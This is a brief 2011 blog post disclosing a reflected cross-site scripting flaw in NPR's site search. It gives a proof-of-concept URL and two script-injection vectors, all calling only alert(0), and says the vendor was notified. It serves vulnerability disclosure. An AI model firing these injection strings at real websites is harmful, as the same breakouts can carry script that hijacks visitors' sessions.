This site is my sandbox. I post security vulnerabilities I discover, project updates, and the occasional rant. Comments are usually disabled, but if you need to contact me, I am sure you will find a way to.
01
Mar 11

NPR

Date: Mar-01-2011
Vendor Notified: Yes
Proof of Concept:
http://www.npr.org/search/index.php?searchinput=alert(0);%3C/script%3E%22%3E%27%3E%3Cscript%3Ealert(0);%3C/script%3E

 

Vectors:

  • alert(0);</script>">'><script>alert(0);</script>
  • ';alert(0)//\';//";//\";alert(0)//--></script>">'><script>alert(0)</script>

Comments are closed.

Archives

Categories


Copyright © 2012 benburns.org
WordPress, sucka. Theme by Theme Lab